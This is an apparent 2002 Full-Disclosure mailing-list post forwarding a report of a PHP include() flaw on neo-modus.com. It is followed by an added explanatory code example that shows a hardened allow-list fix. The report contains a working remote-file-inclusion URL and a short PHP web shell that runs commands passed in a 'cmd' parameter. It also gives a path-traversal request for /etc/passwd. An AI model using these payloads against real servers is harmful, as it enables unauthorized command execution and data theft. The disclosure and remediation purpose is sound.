burpz_at_gmx.net
Date: Wed Oct 02 2002 - 01:01:26 CDT

    > neo-modus.com is the home of the quite popular file sharing utility
    > 'direct connect'; unfortunately their website is vulnerable to a common
    > php include() vulnerability. The message below was sent 2 weeks ago to
    > the 'bugs' email address listed on their website. I didn't get any
    > response.
    >
    > --- Forwarded Message ---
    > > Dear Reader,
    > >
    > > I recently stumbled across your website www.neo-modus.com. I fiddled
    > > around a bit with the .php scripts and found that they are vulnerable
    > > to a very common php error.
    > >
    > > The index.php script takes a parameter 'page', so it knows what page
    > > to show. It then passes the value of this parameter DIRECTLY into an
    > > include() statement. This is very, very bad. Let's say I go to the url:
    > > http://www.neo-modus.com/?page=/etc/passwd - this tries to open
    > > /etc/passwd.html - so I can break out of the document root and view
    > > every file with an .html (or .php?) extension. This seems not too bad,
    > > but there's more. PHP has a feature called "furl_open", which allows
    > > include() to take a URL as a parameter to include it in its page. So
    > > we create a text file on a different webserver (which doesn't parse
    > > .txt files) called test.txt, which contains:
    > >
    > > <?php
    > > // $HTTP_GET_VARS is the pre-PHP 4.1 name of $_GET
    > > printf("<div align=\"left\"><pre>");
    > > printf("%s", nl2br(system($HTTP_GET_VARS['cmd'])));
    > > printf("</pre></div>");
    > > ?>
    > >
    > > we then go to the url
    > > http://www.neo-modus.com/?page=http://my.webpage.com/test.txt&cmd=ls -al
    > >
    > > and we get a nice "ls -al" output run on YOUR webserver. We can run
    > > all commands with privileges of the webserver. I think you can
    > > understand how bad this is.
    > >
    > > To fix these issues, I suggest you disable furl_open in the php
    > > configuration file, and filter the "page" parameter passed to index.php
    > > so that it strips slashes, backslashes, dots and limits it to a
    > > specific directory only.
    > >
    > > Another thing: don't place files which contain password information in
    > > the document root. ConnectToDatabase.php contains sensitive information.
    > > Change your mysql passwords, and limit access to the mysql server from
    > > YOUR website host only. I could connect without problems - this should
    > > not be the case.
    > >


    _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
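A worked illustration of the include() pattern the report describes, with a hardened replacement beside it. This is an added example, not neo-modus.com's index.php (which the post does not show); it assumes a 'page' parameter mapped to files under a pages/ directory and three assumed page names (home, download, about).

```php
<?php
// Added example: reconstruction of the vulnerable pattern from the report
// and a hardened replacement. The page names, the pages/ directory and the
// '.html' suffix are assumptions, not the site's real layout.

// --- Vulnerable pattern, as described in the report -------------------------
// Whatever arrives in ?page= becomes the include target. "/etc/passwd" walks
// out of the document root (it opens /etc/passwd.html), and with
// allow_url_fopen=On a value like "http://attacker/test.txt" is fetched and
// executed as PHP on this server (remote file inclusion).
function render_page_vulnerable(string $page): void
{
    include $page . '.html';
}

// --- Hardened replacement ---------------------------------------------------
// Resolve the request against a fixed allow-list of page names rather than
// stripping characters out of the input. The report suggests a denylist
// (slashes, backslashes, dots); an allow-list is stricter and simpler to audit.
//
// Also set in php.ini (cannot be changed at runtime):
//   allow_url_fopen = Off
//   allow_url_include = Off   ; PHP >= 5.2, governs include/require of URLs
const PAGE_DIR = __DIR__ . '/pages';
const PAGES = ['home', 'download', 'about'];   // assumed page names

function resolve_page(string $page): ?string
{
    if (!in_array($page, PAGES, true)) {
        return null;                           // unknown page -> reject
    }
    $path = PAGE_DIR . '/' . $page . '.html';

    // Defence in depth: realpath() collapses "..", so confirm the final path
    // still lives under PAGE_DIR even if the allow-list is loosened later.
    $real = realpath($path);
    $base = realpath(PAGE_DIR);
    if ($real === false || $base === false
        || strncmp($real, $base . '/', strlen($base) + 1) !== 0) {
        return null;
    }
    return $real;
}

function render_page_safe(string $page): void
{
    $path = resolve_page($page);
    if ($path === null) {
        http_response_code(404);
        echo 'No such page';
        return;
    }
    include $path;                             // only an allow-listed local file
}

render_page_safe($_GET['page'] ?? 'home');
```

With the allow-list in place, both payloads from the report (`?page=/etc/passwd` and `?page=http://my.webpage.com/test.txt`) fall through to the 404 branch before include() is ever reached; the realpath() check only matters if someone later relaxes the allow-list, and the php.ini settings close the remote-include vector for every other script on the host as well.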